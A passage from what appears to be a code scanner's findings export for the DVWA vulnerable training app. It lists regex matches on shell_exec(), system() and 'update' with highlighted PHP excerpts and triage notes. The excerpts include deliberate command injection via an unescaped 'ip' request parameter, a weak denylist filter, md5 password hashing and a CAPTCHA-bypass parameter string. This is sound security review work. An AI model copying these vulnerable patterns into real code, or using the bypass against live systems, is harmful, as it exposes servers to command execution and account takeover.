  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">3</span><span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows 
NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">21:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">22:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">23:</span> \t\t}\n<span class=\"line-number\">24:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">26:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t\t}",
  "line": 22,
  "start": 17,
  "end": 28,
  "severity": "unknown",
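  "note": "Triage: $target is rebuilt from four $octet values on line 17 before it reaches shell_exec(). How each octet is validated is outside this excerpt; confirm that before rating this finding."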
 },
 {
  "id": 182,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">21:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">22:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t\t}\n<span class=\"line-number\">24:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">27:</span> \t\t}\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>{$cmd}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> 
\t}",
  "line": 26,
  "start": 21,
  "end": 32,
  "severity": "unknown",
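  "note": "Triage: same sink as line 22 of this file, on the non-Windows branch. The rating depends on how $target is validated before this point, which this excerpt does not show."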
 },
 {
  "id": 185,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">8:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">10:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">11:</span> \t}\n<span class=\"line-number\">12:</span> \t<span class=\"token keyword\">else</span> {\n<span 
class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t}",
  "line": 10,
  "start": 5,
  "end": 16,
  "severity": "unknown",
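  "note": "Triage: command injection. $target is read from $_REQUEST['ip'] on line 5 and concatenated into the shell_exec() command string with no validation or escaping in between."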
 },
 {
  "id": 186,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">10:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t}\n<span class=\"line-number\">12:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \t}\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>{$cmd}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> }",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
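  "note": "Triage: same sink as line 10 of this file, on the non-Windows branch. Line 18 also writes the command output into $html without HTML encoding."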
 },
 {
  "id": 189,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_keys</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$substitutions</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$substitutions</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token 
punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">20:</span> \t}\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t}",
  "line": 19,
  "start": 14,
  "end": 25,
  "severity": "unknown",
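  "note": "Triage: $target is concatenated into the shell_exec() command string. The only filtering visible is the str_replace() substitution on line 14; the substitution list and the origin of $target are outside this excerpt. Character denylists are a weak control for shell input; check for strict IP validation or escapeshellarg()."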
 },
 {
  "id": 190,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
  "filetype": "php",
  "search": "\\sshell_exec\\s*\\(",
  "match": "<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t}\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping  -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">24:</span> \t}\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>{$cmd}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> }",
  "line": 23,
  "start": 18,
  "end": 29,
  "severity": "unknown",
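  "note": "Triage: same sink as line 19 of this file, on the non-Windows branch. Line 27 also writes the command output into $html without HTML encoding."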
 },
 {
  "id": 227,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\ssystem\\s*\\(",
  "match": "<span class=\"line-number\">6:</span> \t<span class=\"token operator\">&lt;</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">&lt;</span>td<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>A SQL injection attack consists of insertion <span class=\"token operator\">or</span> <span class=\"token string\">\"injection\"</span> of a SQL query via the input data from the client <span class=\"token keyword\">to</span> the application<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">10:</span> \t\t\tA successful SQL injection exploit can read sensitive data from the database<span class=\"token punctuation\">,</span> modify database data <span class=\"token punctuation\">(</span>insert<span class=\"token operator\">/</span>update<span class=\"token operator\">/</span>delete<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> execute administration operations on the database\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t\t\t<span class=\"token punctuation\">(</span>such as shutdown the DBMS<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> recover the content of a given file present on the DBMS file system <span class=\"token punctuation\">(</span>load_file<span class=\"token punctuation\">)</span> <span class=\"token operator\">and</span> <span 
class=\"token keyword\">in</span> some cases issue commands <span class=\"token keyword\">to</span> the operating system<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>SQL injection attacks are a type of injection attack<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> which SQL commands are injected into data<span class=\"token operator\">-</span>plane input <span class=\"token keyword\">in</span> order <span class=\"token keyword\">to</span> effect the execution of predefined SQL commands<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>This attack may also be called <span class=\"token string\">\"SQLi\"</span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">16:</span> ",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 249,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/help/help.php",
  "filetype": "php",
  "search": "\\ssystem\\s*\\(",
  "match": "<span class=\"line-number\">13:</span> \t\t\t<span class=\"token operator\">and</span> simple defacement<span class=\"token punctuation\">.</span> It depends on what the application does <span class=\"token keyword\">with</span> the uploaded file<span class=\"token punctuation\">,</span> including where it is stored<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Objective<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Execute any PHP function of your choosing on the target system <span class=\"token punctuation\">(</span>such as <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.phpinfo.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpinfo()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; 
?></span></span>\n<span class=\"line-number\">19:</span> \t\t\t<span class=\"token operator\">or</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'https://secure.php.net/manual/en/function.system.php'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'system()'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?>) thanks to this file upload vulnerability.&lt;/p></span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
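  "note": "Triage: false positive. The pattern matched the help-page prose 'target system (such as' on line 18, not a call to system(); the only function call on that line is the dvwaExternalLinkUrlGet() link helper."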
 },
 {
  "id": 76,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">76:</span> \t\t<span class=\"token function\">sleep</span><span class=\"token punctuation\">(</span> <span class=\"token function\">rand</span><span class=\"token punctuation\">(</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> \n<span class=\"line-number\">78:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Give the user some feedback\n<span class=\"line-number\">79:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />Username and/or password incorrect.&lt;br />&lt;br/>Alternative, the account has been locked because of too many failed logins.&lt;br />If this is the case, &lt;em>please try again in {$lockout_time} minutes&lt;/em>.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">80:</span> \n<span class=\"highlight\"><span class=\"line-number\">81:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update bad login count</span>\n<span class=\"line-number\">82:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET failed_login <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>failed_login <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> WHERE 
user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">83:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">84:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">85:</span> \t}\n<span class=\"line-number\">86:</span> ",
  "line": 81,
  "start": 76,
  "end": 87,
  "severity": "unknown",
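  "note": "Triage: the match is the code comment on line 81, not SQL. The UPDATE on line 82 goes through prepare() with the :user placeholder bound by bindParam( ..., PDO::PARAM_STR ) on line 83, so no input is concatenated into the query text in this excerpt."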
 },
 {
  "id": 89,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/help/help.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The issue <span class=\"token keyword\">with</span> this CAPTCHA is that it is easily bypassed<span class=\"token punctuation\">.</span> The developer has made the assumption that all users will progress through screen <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> complete the CAPTCHA<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span>\n<span class=\"highlight\"><span class=\"line-number\">27:</span> \t\t\tmove on <span class=\"token keyword\">to</span> the <span class=\"token keyword\">next</span> screen where the password is actually updated<span class=\"token punctuation\">.</span> By submitting the new password directly <span class=\"token keyword\">to</span> the change page<span class=\"token punctuation\">,</span> the user may bypass the CAPTCHA system<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">28:</span> \n<span 
class=\"line-number\">29:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The parameters required <span class=\"token keyword\">to</span> complete this challenge <span class=\"token keyword\">in</span> low security would be similar <span class=\"token keyword\">to</span> the following<span class=\"token punctuation\">:</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span><span class=\"token keyword\">step</span><span class=\"token operator\">=</span><span class=\"token number\">2</span><span class=\"token operator\">&amp;</span>password_new<span class=\"token operator\">=</span>password<span class=\"token operator\">&amp;</span>password_conf<span class=\"token operator\">=</span>password<span class=\"token operator\">&amp;</span>Change<span class=\"token operator\">=</span>Change<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>",
  "line": 27,
  "start": 22,
  "end": 33,
  "severity": "unknown",
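  "note": "Triage: false positive. The pattern matched the word 'updated' in help-page prose on line 27; the excerpt contains no SQL statement. Requiring a word boundary after 'update' in the search rule would avoid matches of this kind."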
 },
 {
  "id": 101,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> CAPTCHA was correct<span class=\"token punctuation\">.</span> <span class=\"token keyword\">Do</span> both new passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token 
variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">29:</span> \n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">31:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token 